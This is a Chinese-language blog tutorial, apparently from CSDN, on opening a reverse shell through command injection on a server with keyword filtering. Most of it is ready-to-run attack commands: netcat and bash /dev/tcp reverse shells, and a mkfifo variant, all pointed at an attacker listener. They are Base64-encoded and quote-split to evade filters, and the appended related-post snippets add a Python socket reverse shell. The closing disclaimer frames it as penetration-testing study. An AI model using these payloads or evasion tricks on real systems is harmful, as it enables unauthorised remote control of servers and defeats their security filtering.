绕过关键字过滤并利用 Netcat 反弹 Shell 的完整流程

已于 2025-03-07 12:54:46 修改
阅读量1k 收藏 14
点赞数 27
分类专栏: WEB渗透 文章标签: web安全 网络安全
于 2025-03-07 12:48:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46311839/article/details/146092957
版权

绕过关键字过滤并利用 Netcat 反弹 Shell 的完整流程

1. 背景知识

在渗透测试或命令注入攻击中,目标服务器可能会有关键字过滤(比如 ncbash/bin/sh 等)。为了绕过检测,我们可以使用 Base64 编码,把真正的命令隐藏起来,并让目标服务器解码执行。

目标:

  1. 在攻击者机器(你自己的电脑)上监听端口,等待目标服务器反向连接。
  2. 在目标服务器上执行 Netcat 反弹 Shell 命令,把 Shell 发送到你的监听端口。
  3. 如果服务器有关键字检测,就用 Base64 编码绕过。

2. 反弹 Shell 的基础方法(无编码)

最基础的 Netcat 反弹 Shell 命令是:

nc -nv 攻击者IP 1234 -e /bin/bash

其中:

  • -n 不进行 DNS 解析,加快连接速度。
  • -v 显示详细信息(可选)。
  • 攻击者IP 是你的 IP(监听端机器)。
  • -e /bin/bash 让 Netcat 把 Bash Shell 绑定到 TCP 连接上。

示例

攻击者机器监听:

nc -nvlp 1234

目标服务器执行反弹 Shell 命令:

nc -nv 192.168.1.100 1234 -e /bin/bash

如果连接成功,你在 nc -nvlp 1234 的窗口里会获得一个远程 Shell。

3. 目标服务器有关键字检测,如何绕过?

(1)先在本地进行 Base64 编码

不能直接输入 nc -nv 192.168.1.100 1234 -e /bin/bash,否则可能被拦截,所以先进行 Base64 编码:

echo -n "nc -nv 192.168.1.100 1234 -e /bin/bash" | base64

输出示例:

bmMgLW52IDE5Mi4xNjguMS4xMDAgMTIzNCAtZSAvYmluL2Jhc2g=

(2)在目标服务器执行 Base64 方式的反弹 Shell

echo bmMgLW52IDE5Mi4xNjguMS4xMDAgMTIzNCAtZSAvYmluL2Jhc2g= | base64 -d | bash

该命令的作用:

  1. echo "Base64编码字符串":输出 Base64 版本的命令。
  2. base64 -d:解码回原来的 nc -nv 192.168.1.100 1234 -e /bin/bash
  3. bash:执行解码后的命令。

如果执行成功,目标服务器会尝试连接 192.168.1.100:1234,并且你在攻击者机器上的 nc -nvlp 1234 监听窗口会收到一个 Shell。

4. 绕过更严格的检测

(1)分块 Base64 解码

echo bmMgLW52IDE5Mi4xNjguMS4xMDAgMTIzNCAtZSAvYmluL2Jhc2g= | ba''se''6''4 -d | b''a''s''h

或者:

echo bmMgLW52IDE5Mi4xNjguMS4xMDAgMTIzNCAtZSAvYmluL2Jhc2g= | ba''se''6''4 -d | /b''i''n/sh

(2)使用 $(echo xxx | base64 -d) 方式

bash -c "$(echo bmMgLW52IDE5Mi4xNjguMS4xMDAgMTIzNCAtZSAvYmluL2Jhc2g= | base64 -d)"

这样 bash -c 负责执行括号里的命令。

5. 如何判断目标服务器支持 Base64?

echo "dGVzdA==" | base64 -d

如果返回 test,说明 base64 是可用的。

6. 可能遇到的问题

(1)目标服务器没有 nc

如果 nc 不可用,尝试使用 Bash 自带的 TCP 反弹:

bash -i >& /dev/tcp/192.168.1.100/1234 0>&1

然后同样可以 Base64 编码:

echo -n "bash -i >& /dev/tcp/192.168.1.100/1234 0>&1" | base64

目标服务器执行:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzEyMzQgMD4mMQ== | base64 -d | bash

(2)目标服务器无法连接你的监听端口

可能的原因:

  • 服务器的防火墙阻止了出站连接。
  • 你的监听端口(1234)被防火墙拦截(关闭防火墙或换个端口)。
  • 服务器的 nc 版本不支持 -e 选项,可以尝试 mkfifo 方式:
mkfifo /tmp/backpipe
/bin/sh 0</tmp/backpipe | nc 192.168.1.100 1234 1>/tmp/backpipe

再用 Base64 编码执行。

7. 总结

监听端(你的电脑):

nc -nvlp 1234

在本地编码 Netcat 反弹 Shell 命令:

echo -n "nc -nv 192.168.1.100 1234 -e /bin/bash" | base64

在目标服务器执行 Base64 反弹 Shell:

echo bmMgLW52IDE5Mi4xNjguMS4xMDAgMTIzNCAtZSAvYmluL2Jhc2g= | ba''se''6''4 -d | b''a''s''h

如果 nc 被禁用,尝试 Bash 反弹:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzEyMzQgMD4mMQ== | base64 -d | bash

这样你每次遇到命令注入、关键字过滤或者反弹 Shell 的时候,就可以按照这个流程一步步分析并尝试不同的方法!

8. 免责声明

本文章仅用于技术研究与网络安全学习,旨在帮助用户提高安全意识,防范潜在的网络威胁。所有内容均基于合法合规的测试环境,任何组织或个人不得将其用于非法用途,否则由使用者自行承担法律责任。本文作者不承担因使用本工具导致的任何直接或间接后果。

Netcat 的反向连接与反弹 Shell
Kali与编程
02-17 1660
在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,建立一个反向连接。在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,建立一个反向连接。假设我们要在目标主机上执行一个连接程序,连接到攻击者主机的IP地址为192.168.1.100,端口号为1234的监听程序,执行一个shell。在目标主机上执行连接程序,连接到攻击者主机的监听程序。
反弹shell的方法总结
m0_48520508的博客
08-26 1470
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Windows
NC / Netcat - 反弹Shell
dieman0446的博客
02-06 284
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat&gt;nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 roo...
渗透测试中反弹shell的27种实战方法全解析,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-08 927
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
netcat反弹shell
iteye_16188的博客
09-01 781
注意:如果想要在小于1024的端口做监听,那么需要root权限 一)通用场合 1. 自己机器:nc —nvlp 443 2. 目标机:nc attacker'sIP 443 —e /bin/bash -n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来) 二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_...
netcat 反弹shell
weixin_40328085的博客
09-18 404
第一种情况:用 bash -i 客户机:netcat -l -p 7777 服务器(被黑主机):bash -i &gt;&amp; /dev/tcp/192.168.227.1/7777 0&gt;&amp;1 &gt;&amp; 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道) 0&gt...
Netcat反弹shell
Yy10205473的博客
01-14 681
Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景 某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装nc时。 基础介绍 将liunx系统下的bash(shell)传递到window系统下的pc 反弹shell:bash -i &gt;&amp; /dev/tcp/IP地址/端口 0&gt;&amp;1 liunx主机连接window主机 bash -i :已交互模式运行bash she
【Linux安全协议】:防范NC反弹shell变种的策略与技巧
本文从Linux安全协议的概述出发,深入探讨了NC反弹shell攻击机制,包括反弹shell的基本原理、类型和特点,以及攻击的流程和成功原因。在此基础上,提出了针对NC反弹shell攻击的技术措施,包括系统和网络层面的预防...
【Linux安全防范秘籍】:如何有效防御NC反弹shell攻击
本文首先对NC反弹shell攻击进行了解释,介绍了Linux安全基础,包括操作系统安全概念、防火墙基础以及安全审计与日志管理。然后,文章详细讨论了防御NC反弹shell攻击的策略,包括系统加固、检测和预防机制以
【Linux网络安全深度解析】:NC反弹shell的原理、影响及应对措施
![【Linux网络安全深度解析】:NC反弹shell的原理、影响及应对措施]...本文系统阐述了NC反弹shell的原理和工作流程,分析了其带来的安全风险和潜在威胁,提供了实际攻击案例的分析。同时,本文探讨了检测NC反弹shell
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4785
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
【工具】Netcat(2)反弹shell
爱美食的Geek
02-21 3032
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符&gt;&amp;,如果在其后加文...
使用 `nc` (netcat) 进行 shell 反弹
suanfa_student的博客
02-15 146
ncnc。
netcat使用及反弹shell
Bu2n的博客
02-20 6085
内网安全反弹shell
8888的博客
09-10 1909
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1。bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2。powercat -c 攻击机器IP -p 9999 -v -ep。
提权(2), Netcat反弹shell
探测???
12-03 401
Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作。
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 6541
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,将其命令行的输入输出转到攻击机。
各种反弹shell方式
m0_58606546的博客
11-17 2373
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i &gt;&amp; /dev/tcp/121.40.248.82/1234 0&gt;&amp;1 1 /bin/bash -i &gt; /dev/tcp/121.40.248.82/1234 0&lt;&amp; 2&gt;&amp;1 1 exec 5&lt;&gt;/dev/tcp/10.10.10.11/443;ca.
Netcat反弹shell的常见命令
01-05
### 关于Netcat反弹Shell的常用命令 对于Netcat反弹Shell而言,通常涉及两个部分的操作:一是攻击者控制的机器上的监听设置;二是目标受害机器上发起连接传递Shell的行为。 在攻击者的机器上,可以使用如下命令来创建一个监听状态: ```bash nc -lvnp 9999 ``` 这条命令中的`-l`表示开启监听模式,`-v`用于显示详细的输出信息以便确认连接情况,`-n`意味着不进行DNS解析而直接通过IP地址工作,最后的`-p 9999`指定了本地要监听的具体端口[^2]。 而在受害方,则需运行相应的客户端命令去主动连接到上述设定好的服务端,且携带一个交互式的shell过去。典型的命令形式如下所示: ```bash nc 192.168.0.105 9999 -e /bin/bash ``` 这里的`192.168.0.105`代表了攻击者所使用的设备的真实公网或局域网内的IP地址,应当依据实际情况调整此数值。同时需要注意的是,在某些版本的Netcat实现里可能不支持直接利用 `-e` 参数来进行文件描述符重定向操作以获取反向shell功能[^1]。 为了兼容更多环境下的Netcat版本差异以及绕过防火墙等安全机制带来的限制,还可以采用其他方式构建类似的反向外壳效果,比如借助Python脚本来完成同样的目的: ```python python -c &#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;x.x.x.x&quot;,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#39; ``` 这段代码实现了与传统Netcat相似的功能,其中`(x.x.x.x,5555)`应被替换为目标服务器的实际IP地址和开放端口[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值